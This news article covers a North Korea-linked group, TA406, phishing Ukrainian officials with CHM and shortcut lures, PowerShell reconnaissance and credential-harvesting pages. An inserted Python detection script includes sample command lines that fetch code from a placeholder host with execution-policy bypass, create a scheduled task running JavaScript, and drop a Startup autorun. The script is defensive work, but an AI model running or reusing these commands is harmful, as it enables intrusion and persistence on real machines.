North Korea-Backed Hacker Group Targets Ukrainian Government for Intelligence Gathering

A North Korea-backed hacking group known as TA406 has been targeting Ukrainian government agencies in a recent cyber-espionage campaign, according to a new report by cybersecurity firm Proofpoint. The goal appears to be gathering intelligence on Ukraine’s ability and willingness to continue resisting Russia’s invasion.

The report suggests that TA406 is trying to assess the risks faced by North Korean personnel already deployed in Ukraine alongside Russian forces. It may also be collecting information to help North Korean authorities prepare for any future requests from Russia for additional military support.

This marks a shift in TA406’s focus. The group has previously targeted diplomatic and government entities in countries like the United States, South Korea, and Russia. Despite this change in target, TA406 continues to use familiar tactics such as phishing, malware distribution, and credential theft.

Phishing Campaigns and Malware Attacks

Proofpoint found that TA406 sent phishing emails to Ukrainian officials using fake identities, including a made-up think tank named the “Royal Institute of Strategic Studies.” The emails contained links to a file hosted on the MEGA platform, disguised as an “AnalyticalReport.rar.” When opened, the file released malware via a Compiled HTML Help (CHM) file, which executed a PowerShell script to connect to a malicious website.

If the targets did not respond immediately, the attackers sent follow-up emails to pressure them into opening the file.

In more advanced attacks, the hackers used PowerShell scripts to gather detailed system information, such as network settings, system details, recent files, disk usage, and antivirus status. This data was then sent to an attacker-controlled server. The malware also ensured long-term access by creating an autorun file in the system’s APPDATA folder.

In other cases, the phishing emails contained an HTML file that led to a ZIP archive. This archive included a harmless PDF and a malicious shortcut file named “Why Zelenskyy fired Zaluzhnyi.lnk.” When the shortcut was opened, it launched another PowerShell script that created a scheduled task to run malicious JavaScript.
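The two delivery chains described above (CHM viewer spawning PowerShell; PowerShell registering a scheduled task that runs a JavaScript file; an autorun dropped under APPDATA) each leave a process-creation trail that a defender can match on. The following is an added example, not code from the Proofpoint report: it runs three simple rules over constructed Sysmon-style events; the event field names, the sample command lines and the placement of the autorun file in the per-user Startup folder are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (hypothetical sample data, not
# telemetry or indicators from the report). Fields: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://placeholder.invalid/r"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"schtasks /create /tn Sync /sc minute /tr "
                "'wscript.exe C:\\Users\\u\\AppData\\Roaming\\sync.js'\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Copy-Item r.exe $env:APPDATA\\Microsoft\\Windows\\'
                'Start Menu\\Programs\\Startup\\r.exe"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n report.docx"},
]


def _base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the names of every rule the event matches (empty list if nothing fires)."""
    hits = []
    child = _base(event["image"])
    cmd = event["cmdline"]
    is_ps = child in ("powershell.exe", "pwsh.exe")
    # Stage 1: the Compiled HTML Help viewer (hh.exe) has no business starting PowerShell.
    if _base(event["parent"]) == "hh.exe" and is_ps:
        hits.append("chm_spawns_powershell")
    # Stage 2: PowerShell registering a scheduled task whose action runs a .js file.
    if is_ps and re.search(r"schtasks(\.exe)?\s+/create", cmd, re.I) and re.search(r"\.js\b", cmd, re.I):
        hits.append("powershell_schtasks_js")
    # Stage 3: PowerShell writing into the per-user Startup folder under APPDATA
    # (assumed location of the autorun file the article mentions).
    if is_ps and re.search(r"(appdata|\$env:APPDATA).*\\startup\\", cmd, re.I):
        hits.append("powershell_appdata_startup_autorun")
    return hits


def triage(events):
    """Map event index -> matched rule names for every event that fires at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}
```

Each rule matches one stage of the chain on its own, so a host that fires two or three of them in sequence deserves much higher priority than a single hit.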

Credential Theft and Fake Alerts

TA406 also used fake Microsoft security alerts sent from Proton Mail accounts. These emails warned of suspicious login attempts and urged users to click a verification link, which led to a credential-harvesting website.

“TA406’s campaign is likely intended to support strategic intelligence gathering for North Korea’s leadership,” said Greg Lesnewich, a senior threat researcher at Proofpoint. He added that the group seems focused on political intelligence rather than military operations on the battlefield.

Part of a Larger Network

TA406 is one of three hacker groups associated with the North Korean cyber-espionage umbrella known as “Kimsuky.” The other two are TA408 and TA427. While TA408 and TA427 have not targeted Ukraine directly, TA427 has shown interest in Ukraine-related information by targeting Western organizations.

Active since at least 2012, TA406 is known for using both malware and phishing attacks. The group has used tools like Konni, Sanny, BabyShark, and Amadey in previous operations. Recent attacks by related groups have also used fake documents like work logs and insurance files to trick users into launching malware.

The latest campaign highlights how cyber threats are evolving as geopolitical conflicts continue to deepen. Experts warn that such operations not only risk data theft but could also influence military and political strategies.

Source: Dark Reading
